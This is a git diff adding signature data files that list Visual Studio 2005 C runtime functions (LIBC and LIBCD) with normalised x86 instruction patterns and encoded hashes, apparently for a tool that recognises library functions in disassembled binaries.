+_towupper,"PUSH CONST\nPUSH R32\nCALL CONST\nPOP R32\nTEST R32,R32\nPOP R32\nJCC CONST",NXgBMjSFtA6MK0SIOmU1PAAAAAAAAAAA6jKEuDplNTzqMoS48uGvmCQDw52o0rLX6jKEuDplNTz8UrtzjCtEiAAAAAAAAAAA/FK7cwAAAAAAAAAANIW0DjplNTwdnEWuqNKy1wAAAAAAAAAA6jKEuDSFtA41eAEyHZxFrjplNTwAAAAAJAPDneoyhLjqMoS4,[],773a7d567912ebbf325ec4e646ec4dbd32b9ad74,VS2005,LIBC.LIB
+__mktemp,"PUSH CONST\nMOV R32,R32\nXOR R32,R32\nPOP R32\nDIV R32\nINC DWORD PTR SS:[EBP+CONST]\nMOV R32,R32\nADD R8,CONST",QrMY/zV4ATIAAAAAnIZROCbu4WVxJsRzWLx0dge2M6ZhmoGJB7YzphTEiGpZFC89NjtIqaqT3bIAAAAAcSbEc0Lwo7YkA8OdWRQvPRTEiGoUxIhqJAPDnc1ZUCJC8KO2j2EBXwe2M6YAAAAANXgBMkLwo7YkA8OdJu7hZaqT3bIAAAAAqpPdsgAAAAAAAAAAFMSIaibu4WWchlE4QvCjtjY7SKlCsxj/YZqBiWGagYkHtjOmnIZROBTEiGqPYQFfFMSIaibu4WWchlE4zVlQIqqT3bIAAAAA,[],407fb867df51079d4351008c3d4fdbcb54263865,VS2005,LIBC.LIB
+_swscanf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],CONST\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV DWORD PTR SS:[EBP+CONST],R32",XlLj6QAAAAAAAAAA,2BQLuNgUC7jaJOkV2iTpFQAAAAAAAAAAgM1KNtok6RXYFAu4,2bafa66892dfbf32706dd844d3d179743099ff8f,VS2005,LIBC.LIB
+_fprintf,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",gK7LzQAAAAAAAAAA,bWSmYkco7JwAAAAAWNooOljaKDoNzMAB9pxlVEco7JwAAAAA+y3xuG1kpmJeToBoDczAASh59rYAAAAARyjsnAAAAAAAAAAAWNooOk+LzAr1QnMbR7G+cE+LzApY2ig6KHn2tk+LzAr7LfG4Xk6AaG1kpmL2nGVU9UJzG0+LzAr7LfG4T4vMCgAAAAAAAAAA,519e8a9b9e2d2526cdb97b48d3d87ee0763007a3,VS2005,LIBC.LIB
+___wdtoxmode,"MOV R32,CONST\nNOT R8\nAND R32,CONST\nPUSH CONST\nOR R8,CONST\nPUSH R32\nSHL R32,CONST\nOR R32,R32",z+tiHPK0WfjYzQSmsZnkEVv7EJfRdPvW0XT71vQ3pT/RdPvW0XT71lv7EJf0N6U/5TL5Se68llvs4ES8euIsMbGZ5BHytFn47OBEvM/rYhzqMoS42M0EpvK0Wfh64iwx7ryWW8/rYhzqMoS48rRZ+Fv7EJfRdPvW0XT71vQ3pT/RdPvW0XT71vQ3pT/RdPvW9DelPwAAAAAAAAAA6jKEuNjNBKbP62IcW/sQlwAAAAAAAAAA,[],9d0ca016c32085d6c96068ef2266a17a4c385587,VS2005,LIBC.LIB
+__wstat,"PUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32\nCALL CONST\nMOV R32,R32\nADD ESP,CONST\nCMP R32,R32",QvjW1gAAAAAAAAAAyPvC5kL41tYAAAAAiFwj6+iZVTqJOZmHLY6hfA49NxTVdbCAM4wKhpw3sKTyoP4qiTmZh+iZVToVQb8RCQomZg52sqsAAAAAFUG/EWHJmowAAAAAdcK7+0L41tYAAAAA1XWwgJw3sKTyoP4qYepA85w3sKQkP6zuYcmajEL41tYAAAAADnayq5w3sKQkP6zu0LhLTZw3sKTyoP4q8qD+Kpw3sKSgNzqhoDc6oXXCu/sAAAAAJD+s7uiZVTrQxMhtIcjSeMj7wuakrWD6nDewpA49NxTYxfZELY6hfA49NxQzjAqG8qD+KtC4S02cN7CknDewpA49NxQtjqF80MTIbeiZVToFa6+36JlVOibu4WUAAAAA2MX2RA49NxTiX7WSDj03FCbu4WUAAAAApK1g+mHqQPMbLlt/nDewpA49NxQtjqF8Kjna1gkKJmbI+8LmGy5bfwkKJmYqOdrW4l+1kkL41tYAAAAABWuvt4k5mYeIXCPrJu7hZUL41tYAAAAA,[],05886a14d49959f3fcf1267b8d866a71416c5f85,VS2005,LIBC.LIB
+_vswprintf,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH CONST\nCALL CONST\nPOP R32\nPOP R32",/gc2HuudzdcAAAAAFgSryf4HNh52yGOL/gc2Ht8TwOUAAAAA653N1wAAAAAAAAAA3xPA5f4HNh43XfGVN13xleudzdcAAAAAdshji98TwOUAAAAA,[],842f5e1df26bd3723d888bd35ec55096b3db8bf1,VS2005,LIBC.LIB
+__wcsset,"MOV R16,WORD PTR SS:[ESP+CONST]\nMOV WORD PTR DS:[R32],R16\nINC R32\nINC R32\nJMP SHORT CONST",m+/JPulYYesAAAAAAaF1swAAAAAAAAAAAvsabelYYesAAAAA6Vhh6wGhdbMC+xpt,[],e4bfa311cf0300d6eaab04e03d2dda706889a64b,VS2005,LIBC.LIB
+__wexecve,"MOV R32,R32\nOR DWORD PTR SS:[EBP+CONST],CONST\nPUSH CONST\nPUSH R32\nCALL CONST\nPOP R32\nTEST R32,R32\nPOP R32",TQTaVnLoOkXpXXtoXqODJyn3ZCMAAAAA7Q+/3yn3ZCMAAAAA6V17aHLoOkUAAAAAKfdkI0FF0Bu5m+6qcug6RfQ42DYSoox5EqKMefQ42DZBG/+AuZvuqkFF0BsAAAAAQRv/gHHbI37EkqZoQUXQG0L41tYAAAAAQvjW1gAAAAAAAAAAQRv/gMSSpmjx1sdAxJKmaEL41tYAAAAAcdsjfu0Pv99Lfz7W8dbHQPQ42DYAAAAAsRHxBO0Pv99Lfz7Wcug6RUFF0Bu5m+6qcug6Rfvd3QRy6DpFcug6RfQ42Db73d0E+93dBEEb/4BNBNpW9DjYNkEb/4BNBNpWHV2wR3LoOkVy6DpFS38+1rER8QReo4Mn,[],d02d9c093047c22e0431301d7a608781b690e991,VS2005,LIBC.LIB
+__matherr,"XOR R32,R32\nRETN",Us42lQAAAAAAAAAA,[],2c4970053791676276ea7814b8d80555f3d32390,VS2005,LIBC.LIB
+__wgetpath,"AND WORD PTR DS:[R32],0\nSUB R32,R32\nNEG R32\nSBB R32,R32\nPOP R32\nAND R32,R32\nPOP R32\nPOP EBP",6jKEuOlYYevqMoS46jKEuCbu4WWSw9PbksPT2w3MwAFeo4Mnar57FOlYYesAAAAAXqODJxsuW38AAAAAJu7hZRsuW38AAAAAGy5bf+lYYevqMoS46jKEuOlYYeuSw9PbksPT2w3MwAFeo4MnXqODJxsuW38AAAAA6Vhh6xsuW38m7uFlJu7hZRsuW38AAAAAGy5bf+oyhLjpWGHr6Vhh6+D8TTENzMABDczAAelYYesAAAAADczAAeD8TTEAAAAAQUXQG+D8TTEAAAAA4PxNMQAAAAAAAAAA6Vhh6y5Vuf4NzMABDczAAelYYesAAAAALlW5/kFF0BuVRyoElUcqBOlYYevqMoS4,[],74e54ebdd4013b8ad74ad76e7194711c909779fe,VS2005,LIBC.LIB
+___crtGetLocaleInfoW,"LEA ESP,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR FS:[0],R32\nPOP R32\nPOP R32\nPOP R32\nLEAVE\nRETN",uyGU9rCfSqt1O0xhGNt4yuKh3IcAAAAAJu7hZeKh3IcAAAAA/Y4vaLu2XCwY23jKu7ZcLCbu4WW7IZT20S3Jeru2XCxbSJoXu7ZcLLu2XCwY23jKuyGU9uAMOXAGr+YW4qHchwAAAAAAAAAAkBU+pxY4CCIAAAAArgPNLybu4WXtia+3FjgIIibu4WXQuj0ddTtMYYzn4+kAAAAABq/mFibu4WWQFT6nsJ9Kq+Kh3IcAAAAA1nzuDP2OL2gAAAAA0Lo9HSbu4WW7IZT24Aw5cCbu4WWQFT6n7Ymvt7u2XCwY23jKjOfj6eKh3IcAAAAAW0iaF64DzS/WfO4M,[],54e1593a13fd71ec44a4856304fc60ceb086ca29,VS2005,LIBC.LIB
+_ftell,"SUB R32,R32\nADD R32,R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,R32\nSAR R32,CONST\nAND R32,CONST\nLEA R32,DWORD PTR DS:[R32*4]\nSHL CONST2,CONST",PM5hIpyGUTjkUryfQvjW1gAAAAAAAAAAFMSIauj+gdC0QwJrKcTkJ29ztAe09pSW5FK8n5yGUTgUxIhqcug6RZyGUTgUxIhqtPaUllgrj1YUxIhqFMSIauj+gdC0QwJrHhi6OUL41tYAAAAAtEMCa3LoOkUAAAAAtEMCa3LoOkUAAAAAcug6RVgrj1YUxIhq6P6B0HLoOkUAAAAAW9AV4JyGUTgeGLo5FPMh4KYjW4ic51fb6P6B0HLoOkUAAAAAWCuPViGHeWMAAAAArydXXEL41tYAAAAAb3O0B022AW3uj+9onIZRONJEIirLgsuVy4LLlUL41tYAAAAAnOdX268nV1yI6UEOpiNbiK8nV1yI6UEO0kQiKoTH21guVbn+7o/vaE22AW1b0BXgLlW5/gTQxLWvsJ+GW9AV4NchGdFNtgFtiOlBDj4MmkTLgsuVr7CfhoTH21gAAAAATbYBbSGHeWMAAAAA1yEZ0SGHeWMAAAAABNDEtfh3+cEpxOQnIYd5Y/h3+cFBRdAbPgyaRFvQFeA8zmEiQUXQG/h3+cEAAAAA+Hf5wYTH21gAAAAAhMfbWEL41tYAAAAAy4LLlUL41tYAAAAA,[],fd755861bcb0e59dea60b5b9b36d5804026ead56,VS2005,LIBC.LIB
+__wexecl,"LEA R32,DWORD PTR SS:[ESP+CONST]\nPUSH CONST\nPUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",fqu4sQAAAAAAAAAA,cug6RfQ42DYSoox5cug6RUFF0Bu5m+6quZvuqkFF0BsAAAAAQRv/gHHbI37EkqZoQUXQG0L41tYAAAAAQvjW1gAAAAAAAAAAQRv/gMSSpmjx1sdAxJKmaEL41tYAAAAAcdsjfl2OTfBLfz7W8dbHQPQ42DYAAAAAEqKMefQ42DZBG/+AsRHxBF2OTfBLfz7Wcug6Rfvd3QRy6DpFcug6RfQ42Db73d0E+93dBEEb/4BNBNpW9DjYNkEb/4BNBNpWHV2wR3LoOkVy6DpFS38+1rER8QReo4MnTQTaVnLoOkXpXXtoXqODJ8KaPa0AAAAAXY5N8HLoOkUAAAAA6V17aHLoOkUAAAAAwpo9rXLoOkUAAAAA,71433449b28941ef118224fe9946dae8a2f75b6b,VS2005,LIBC.LIB
+_$I10_OUTPUT,"MOVZX R32,WORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nAND WORD PTR SS:[EBP+CONST],0\nMOV DWORD PTR SS:[EBP+CONST],CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nDEC DWORD PTR SS:[EBP+CONST]",sQusCa6bSEoAAAAAdbDo5XEqLS3z2TnjVjxq9a6bSEoAAAAArptISnOiGWEAAAAA260UYYgXWkgAAAAAoqZOGucL35d1pVPCCrgr9YgXWkgAAAAA89k5407F/O2skKyXTsX87U7F/O2skKyX6mEuK4z41Xhy6DpFc6IZYQAAAAAAAAAAQvjW1gAAAAAAAAAAcug6Ra9UwKsUxIhqkqOkUecL35d1pVPCcug6RYz41Xi7IZT2FMSIanLoOkXo/oHQDyNFj1jaKDqchlE4uyGU9oz41XipH/Rdcug6RdvKqUCchlE46P6B0HLoOkUAAAAAdaVTwru2XCw1FnITnIZRONvKqUDbrRRhcug6Ra6bSEqvVMCrbDpHUYgXWkgAAAAAr1TAq0L41tYAAAAApg6IB+phLitYK49WNRZyE6kf9F0AAAAA5wvfl6ZYBI4dmt5pu7ZcLKZYBI4dmt5pcuZrakL41tYAAAAAfsosU5KjpFGipk4ajPjVeH7KLFMPI0WPHZreaWeBgMFy6DpFplgEjmeBgMFy6DpFiBdaSHOiGWEAAAAAnIZROIz41XhY2ig6rqjC1q6owtZ1sOjlWNooOoz41Xjksil90EVWw4z41Xhy6DpFZ4GAwWeBgMFy6DpFrJCsl3LoOkVy6DpF5LIpfWw6R1EAAAAAcSotLXLoOkVy6DpFWCuPVtBFVsMAAAAAjPjVeHLoOkVY2ig6cug6RXWw6OXOYK7gWNooOnLoOkWchlE4zmCu4HWw6OWuqMLWcug6RbELrAkUxIhqqR/0XXLma2oAAAAAFMSIanLoOkVR2R0fnIZRONvKqUDksil9UdkdH3LoOkUAAAAA5LIpfQq4K/UAAAAA28qpQIgXWkgAAAAAcug6RVY8avWxC6wJ,[],cf0e24a7db69b567af869aa9757edef4e818cb07,VS2005,LIBC.LIB
+__except_handler2,"PUSH EBP\nMOV EBP,DWORD PTR DS:[R32+CONST]\nPUSH -1\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP EBP\nTEST DWORD PTR DS:[R32],CONST",RZ7D67u2XCwAAAAAjdXDuZdxUZ75y5whE40P80Wew+shh3ljP1p894/1BRqN1cO5l3FRnv5P0mgAAAAA/k/SaAAAAAAAAAAAl3FRnv5P0mgAAAAAu7ZcLJdxUZ75y5whIYd5Y5dxUZ4Vx7Oaj/UFGgAAAAAAAAAAFcezmru2XCwAAAAA+cucIUWew+sTjQ/z,[],77bd43ab3b2a6d76b44563e6f852015188d64b02,VS2005,LIBC.LIB
+__mbsncpy,"LEA R32,DWORD PTR DS:[R32+CONST]\nXOR R32,R32\nMOV R32,R32\nSHR CONST,CONST\nREP STOS DWORD PTR ES:[R32]\nMOV R32,R32\nAND CONST2,CONST\nREP STOS BYTE PTR ES:[R32]",ctLtDzTg+sKgOuGLXqODJ3LoOkUAAAAANOD6whMYepJy6DpFhgphXjTg+sKgOuGLM5X5zDlafGAAAAAAcug6RYYKYV5eo4MnXqODJxMYepIAAAAAJu7hZTlafGAAAAAA3NgTIRMYepIAAAAAOVp8YAAAAAAAAAAAExh6kibu4WUV3juImqXjCOGPNi0zlfnM4Y82LRMYepJy0u0PoDrhi9zYEyFeo4MnFd47iCbu4WUAAAAA,[],9d0006d57dab9793a830c1440dbd0e443340c8f5,VS2005,LIBC.LIB
+__fputchar,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,oP5JkAAAAAAAAAAAW9dWdqD+SZBVQiKjVUIiowAAAAAAAAAA,[],72ac9aa71258d2278c40d576fa68a76776027f9a,VS2005,LIBC.LIB
+_putchar,PUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nRETN,x2MDRgAAAAAAAAAA,VUIiowAAAAAAAAAAoP5JkAAAAAAAAAAAW9dWdqD+SZBVQiKj,efed97183fc4e9f79b547a23bc81a326507cf398,VS2005,LIBC.LIB
+___initstdio,"PUSH CONST\nPUSH R32\nCALL CONST\nPOP R32\nMOV DWORD PTR DS:[0],R32\nTEST R32,R32\nPOP R32\nJCC CONST",qT64gQ+Yxj8iTqpzD5jGP37qK7V53AH4cug6RS1s1BbWXxB8Aq+H0UFF0Bty6DpF1l8QfA+Yxj+pPriBfuortX7qK7V53AH4QUXQG6qNX8UAAAAALWzUFg+Yxj+pPriBxtaPQHLoOkWXcVGeAOHWawAAAAAAAAAAcug6RaqNX8VBRdAbIk6qc37qK7V53AH4l3FRnmp8XLMAAAAAanxcsw+Yxj+pPriBedwB+AKvh9EAAAAAqo1fxQKvh9EA4dZr,[],e9c0c010f4ef9242f3f02214ec4ed75efec04c1d,VS2005,LIBC.LIB
+___endstdio,"PUSH R32\nPUSH R32\nPUSH CONST\nXOR R32,R32\nPOP R32\nCMP DWORD PTR DS:[0],R32\nJCC CONST",2/OqugGhdbM1FnITJw91Eru2XCwFa6+3WC45YdV/HhxGk6MEBWuvt7u2XCyHR1I/NRZyE1guOWEAAAAAGafL2dOwAxwAAAAAAaF1swAAAAAAAAAA07ADHEaTowTVfx4ch0dSP7u2XCwAAAAAu7ZcLNOwAxwZp8vZRpOjBNOwAxwnD3US1X8eHAAAAAAAAAAA,[],8f4cda1b15a24185dec2f7e633ccce657a553474,VS2005,LIBC.LIB
+__fload,"PUSH EBP\nMOV EBP,ESP\nADD ESP,-0C\nPUSH R32\nMOV R16,WORD PTR SS:[EBP+CONST]\nMOV R16,R16\nAND R16,CONST\nCMP R16,CONST",kdu5906gi7EAAAAAkkdARZHbufeQsHuQTqCLsQAAAAAAAAAAkLB7kE6gi7EAAAAA,[],78cec4c203b18fae9507745442e5a193c74213a0,VS2005,LIBC.LIB
+__ctrandisp2,"PUSH EBP\nMOV EBP,ESP\nADD ESP,-2A0\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST",5fTU+wAAAAAAAAAA,kdu5906gi7EAAAAAkkdARZHbufeB9QA6TqCLsQAAAAAAAAAAgfUAOk6gi7EAAAAA,2524fd33ef9f5da296e7d39c3c6fd0d26afeda5f,VS2005,LIBC.LIB
+__cintrindisp2,"PUSH EBP\nMOV EBP,ESP\nADD ESP,-2A0\nPUSH R32\nWAIT\nFSTCW WORD PTR SS:[EBP+CONST]\nWAIT\nCMP DWORD PTR DS:[0],0",3POx9JfzhTsAAAAAh+u1AtzzsfSX84U7l/OFOwAAAAAAAAAA,[],da22b4e5f31c9ccb3d4307a4ed8a2dcf4aabc8ed,VS2005,LIBC.LIB
diff --git a/1.73/Data/libcd.dat b/1.73/Data/libcd.dat
new file mode 100755
index 0000000..3aeafa3
--- /dev/null
+++ b/1.73/Data/libcd.dat
@@ -0,0 +1,1086 @@
+__vsnprintf,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPOP R32",mY/2juRSvJ+S9NEB8BpJtfvKdJIWcp1ouz1JhQAAAAAAAAAAnIZROORSvJ+S9NEBdYMGr5yGUTichlE45FK8n5yGUTichlE4kvTRAeRSvJ91gwavFnKdaLs9SYUAAAAA+8p0kgAAAAAAAAAAnIZROORSvJ+S9NEBdYMGr5yGUTjwGkm15FK8n5yGUTjwGkm1kvTRAeRSvJ91gwav,[],03d04de2584ceb94a12d1105eb6a26c95c5fa811,VS2005,LIBCD.LIB
+__heapmin,"PUSH EBP\nMOV EBP,ESP\nCALL CONST\nPUSH CONST\nMOV R32,DWORD PTR DS:[0]\nPUSH R32\nCALL DWORD PTR DS:[0]\nTEST R32,R32",xJKmaADh1msAAAAAAuh/9MSSpmiDEaxcJu7hZQDh1msAAAAAvOu/qSbu4WUC6H/0AOHWawAAAAAAAAAAgxGsXADh1msAAAAA,[],93c7bbe7c265f5db9d3182268147fbcd64ff015a,VS2005,LIBCD.LIB
+___crtGetEnvironmentStringsA,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,DWORD PTR SS:[EBP+CONST]\nSAR R32,CONST\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nPUSH CONST\nPUSH CONST\nPUSH CONST",dvz6pvh3+cFmeTE1ZnkxNU+LzAoAAAAAXqODJyEgQSUAAAAA86W31dFIlKV2/Pqm+Hf5wSEgQSUAAAAAle96EE+LzAoAAAAA+Hf5waQXY28AAAAAISBBJbCVBRFxv1DBO5WWKhFCrEX+WoskpBdjbzuVlioahBx2Ju7hZU+LzAoAAAAAOBSAsE+LzAoAAAAAT4vMCgAAAAAAAAAAGoQcdl6jgyc+yobZdvz6pnb8+qYZpmb/PsqG2V6jgycAAAAAGaZm/9FIlKUAAAAAXqODJ6QXY28AAAAAsJUFEZXvehBK/8jCkjaOX0+LzAoAAAAAdvz6pmZ5MTUZpmb/GaZm/9FIlKUAAAAABIgnTTgUgLCSNo5fZnkxNU+LzAoAAAAAZnkxNU+LzAoAAAAA0UiUpdFIlKWchlE40UiUpSbu4WWchlE4cb9QwV6jgycAAAAA/lqLJE+LzAoAAAAASv/IwgSIJ02V73oQnIZROPh3+cF2/PqmnIZROPh3+cF2/Pqmdvz6pvh3+cFmeTE1EUKsRU+LzAoAAAAA,[],2bf35d22bfbd01904726f70f716b85eadd14b5f1,VS2005,LIBCD.LIB
+__stati64,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOVSX R32,BYTE PTR DS:[R32]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nSUB R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nJMP SHORT CONST",2psftsO+4B6A9NBHGctX2dqbH7YpwMtpJvgYKeikXWjy9AgzP6j9LC+iRdUAAAAAL6JF1QAAAAAAAAAA76Z+QPL0CDMm+BgpzlVWP9qbH7YpwMtp6KRdaC+iRdUAAAAAw77gHpBmuxcAAAAA8vQIMyzdq7ropF1ogPTQRy+iRdUAAAAAGGtoP9qbH7Z+RkN02psftoD00Efamx+26KRdaC+iRdUAAAAAiw0UTNqbH7Z+RkN0FHK6BBnLV9mkF2NvfkZDdIcEKS/amx+2KcDLaeikXWjtbek8pBdjb6Sak6vdLNxt2psfti3sUUaA9NBH2psftoD00Efamx+23SzcbaSak6vopF1oLN2ruj+o/SwAAAAA7W3pPOikXWjvpn5A6KRdaC+iRdUAAAAAgPTQRy+iRdUAAAAA2psftsO+4B6A9NBHfkZDdBhraD/amx+2pJqTq85VVj8AAAAA2psftoD00Efamx+2w77gHosNFEwAAAAAgPTQRy+iRdUAAAAAhwQpLy+iRdUAAAAAiFkaqxRyugTopF1oLexRRtqbH7Z+RkN0kGa7Fy+iRdUAAAAA,[],2e6d402d9cefc8bf0d4c1a9413f20f819d1941e1,VS2005,LIBCD.LIB
+_atof,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32",nIZROAK/JybIUl/XJAPDnfc0exDa32ljchMCgPc0exDa32ljyFJf1yQDw50AAAAA9zR7EAK/JybIUl/X2t9pY5yGUTgAAAAAAr8nJgAAAAAAAAAA,[],b867b066ab0ef19931428e3c88f2abdc2e24c178,VS2005,LIBCD.LIB
+__forcdecpt,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOVSX R32,BYTE PTR DS:[R32]\nPUSH R32\nCALL CONST\nADD ESP,CONST",T4vMCgAAAAAAAAAAqoamK5yGUTgAAAAAnIZRONl1N+U1kdhcNZHYXJZQP3AAAAAA2XU35TaKmLGqhqYrllA/cJZQP3BPi8wKZsm5bzWR2FzZdTflNoqYsdl1N+U1kdhc,[],375811222b52ddcea3b0600a80c47e542ac867cd,VS2005,LIBCD.LIB
+__cftoe,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,DWORD PTR SS:[EBP+CONST]\nMOVSX R32,BYTE PTR DS:[0]\nNEG R32\nSBB R32,R32\nINC R32\nADD R32,R32",niDkvdUc1LbYADX72AA1+9TZ7svS348MHrZ4mAAAAAAAAAAAAQbezpyGUThffqqI9+GuNtUc1LbYADX71Nnuy9TZ7su3d07cB6kT0QAAAAAAAAAAAtPm2G9Pe4VaY6SLb097hZyGUThffqqInIZROC8GMaubBboEt3dO3AepE9EetniY0t+PDNTZ7su3d07c1NnuywepE9EetniYLwYxq/fhrjaeIOS9mwW6BC8GMasAAAAAWmOkiwEG3s4AAAAAX36qiJyGUTgAAAAA1RzUtgAAAAAAAAAA,[],88200c37584e40344622a902d23dee54bcc64beb,VS2005,LIBCD.LIB
+__positive,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nFLD QWORD PTR DS:[R32]\nFCOMP QWORD PTR DS:[0]\nFSTSW R16\nTEST R8,CONST",1RzUtgAAAAAAAAAAlnPwX9Uc1LYAAAAAfC8Z3ZZz8F/0Ke4I9CnuCNUc1LYAAAAA,[],392eff8f097deef8073efe97fa3d3ab4cb9f96d1,VS2005,LIBCD.LIB
+__cftog,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOVSX R32,BYTE PTR DS:[R32]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nTEST R32,R32\nJCC CONST",mRKUgS5qDfVrhEljIkyqp8RvvmMAAAAAiDscvSJMqqdeo4Mna4RJY4LDJkEuag31T4vMCgAAAAAAAAAAXqODJ4g7HL0AAAAAgsMmQcRvvmOIOxy9LmoN9U+LzAoAAAAAxG++Y0+LzAoAAAAA,[],77be671621912df9caf87533b14d081145d1f40d,VS2005,LIBCD.LIB
+__cftof,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOVSX R32,BYTE PTR DS:[0]\nTEST R32,R32\nJCC CONST",sIU412nNBgAAAAAAac0GANUc1LbfEn1OoX76nSnZq7AAdk1u7t12oNUc1LbfEn1O1RzUtgAAAAAAAAAAXqODJwEG3s4AAAAAAtPm2KF++p2y7DKCcVqUOnh/OCYAAAAAAHZNbu7ddqCwhTjXeH84JgAAAAAAAAAAoziEypgfv9AAAAAA5dfFaQAAAAAAAAAAmB+/0AAAAAAAAAAAsuwygl6jgycAAAAA3xJ9TtUc1LaCwyZBAQbezinZq7AAdk1uKdmrsO7ddqCwhTjX3Bx+juXXxWlxWpQ6gsMmQdwcfo6jOITK,[],83cb99a2ef14cc78b78ca0118302acbb0e147639,VS2005,LIBCD.LIB
+__fassign,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]",VaatKKR34JN1TFKYT4vMCgAAAAAAAAAApHfgk0+LzAoAAAAAdUxSmE+LzAoAAAAA,[],e82bf082b9271b0ba9475e8fbd63309ba728f023,VS2005,LIBCD.LIB
+__cfltcvt,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",nIZROJyGUTguag31nIZROKcZdzId0S+sHdEvrADh1msAAAAALmoN9QDh1msAAAAAAOHWawAAAAAAAAAAcMiU5C5qDfWchlE4pxl3MgDh1msAAAAA,[],ea7bae4dcbe108bb9ced5575e644a87614fbf0dd,VS2005,LIBCD.LIB
+__cropzeros,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOVSX R32,BYTE PTR DS:[R32]\nTEST R32,R32\nJCC CONST",fXBLhU+LzAqkF2NvRvT3gE+LzApeo4MnMdkz+21JBQYAAAAA+L7Ce31wS4XIUl/X+L7Ce0b094A+yobZT4vMCgAAAAAAAAAAXqODJ0b094AAAAAAbUkFBjHZM/vIUl/XyFJf16QXY28AAAAAbUkFBvi+wnvIUl/XyFJf16QXY28AAAAAJ6Bn031wS4X4vsJ7pBdjbzHZM/ttSQUGPsqG2Ub094AAAAAAbUkFBjHZM/ttSQUGpBdjb31wS4X4vsJ7yFJf121JBQYAAAAA,[],9f9e695ffa15ae01ae16a1b8b6e5ea0fd0f595ec,VS2005,LIBCD.LIB
+__strset,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,R32\nXOR R32,R32\nOR R32,CONST\nREPNE SCAS BYTE PTR ES:[R32]",AioKwgAAAAAAAAAA,[],d89078728a38cac5b74952b00ec465829aef82c8,VS2005,LIBCD.LIB
+_wcstok,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",ISBBJSEgQSXpbmZtXqODJz7KhtkAAAAAISBBJV6jgyfds2eG6W5mbSEgQSVeo4Mn3bNnhvFxVSIAAAAAXqODJz7KhtkAAAAAISBBJchSX9deo4MnPsqG2SEgQSUAAAAAXqODJz7KhtkAAAAA8XFVIkFF0BsNzMABXqODJ3FalDoAAAAAyFJf1yEgQSUAAAAAcVqUOiEgQSUAAAAADczAAU+LzAoAAAAAQUXQG0+LzAoAAAAAT4vMCgAAAAAAAAAAISBBJfFxVSJxWpQ6VaatKCEgQSWznZW6cVqUOiEgQSUAAAAAs52VuiEgQSUAAAAAPsqG2SEgQSUAAAAAISBBJXFalDpxWpQ6ISBBJSEgQSXpbmZtcVqUOiEgQSUAAAAA6W5mbSEgQSVeo4MnPsqG2SEgQSUAAAAA,[],db29a91f57cfe610ec85fb5d941b74cff8d12967,VS2005,LIBCD.LIB
+__mbsinc,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32+CONST]\nAND R32,CONST",PsqG2diy05kAAAAA2LLTmQAAAAAAAAAAzsnYItiy05k+yobZ,[],4a561e1bd2f8dbd29caa755723d6eb7a42708464,VS2005,LIBCD.LIB
